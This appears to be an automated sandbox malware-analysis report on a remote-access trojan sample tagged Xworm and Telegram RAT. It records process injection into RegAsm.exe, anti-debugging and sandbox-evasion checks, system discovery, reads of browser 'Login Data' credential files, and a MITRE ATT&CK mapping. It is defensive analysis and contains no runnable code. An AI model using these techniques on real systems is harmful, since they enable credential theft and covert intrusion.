Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: FC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2AF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1458891957.0000000000621000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030800082.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000003.1030481717.0000000000B54000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000004.00000002.1030719769.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114745308.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000007.00000002.1114654116.00000000008F4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000003.1458583330.0000000000661000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe, 00000002.00000002.1459004700.0000000000661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWg
Source: RegAsm.exe, 00000003.00000002.1456316118.0000000005FF3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D9423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002D9423
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D5772 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002D5772
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D58FE SetUnhandledExceptionFilter,	0_2_002D58FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 0_2_002D59CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002D59CC
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD9423 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CD9423
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD5772 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00CD5772
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD58FE SetUnhandledExceptionFilter,	2_2_00CD58FE
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: 2_2_00CD59CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00CD59CC

Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BBD008	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	0_2_002EB2AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	0_2_002EB2F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	0_2_002E22D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	0_2_002EB393
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_002EB41E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	0_2_002EB672
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_002EB797
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	0_2_002EB89D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_002EB979
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	0_2_002E1E74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_002EAFFB
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	2_2_00CE22D0
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	2_2_00CEB2F8
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	2_2_00CEB2AD
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	2_2_00CEB393
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00CEB41E
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	2_2_00CEB672
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00CEB797
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetLocaleInfoW,	2_2_00CEB89D
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00CEB979
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: EnumSystemLocalesW,	2_2_00CE1E74
Source: C:\Users\user\AppData\Roaming\SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_00CEAFFB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Yara match	File source: 3.2.RegAsm.exe.7c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.7c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1458106841.0000000007C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR

Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b729c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.b7dc40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.99f940.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.6d1c40.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe.9946c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1453808203.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1030380383.0000000000B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1455196858.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1458491567.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1458491567.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1458718699.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.1114239427.0000000000995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 5604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe PID: 1572, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	411 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	31 Obfuscated Files or Information	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	241 Security Software Discovery	Distributed Component Object Model	1 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Modify Registry	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	131 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement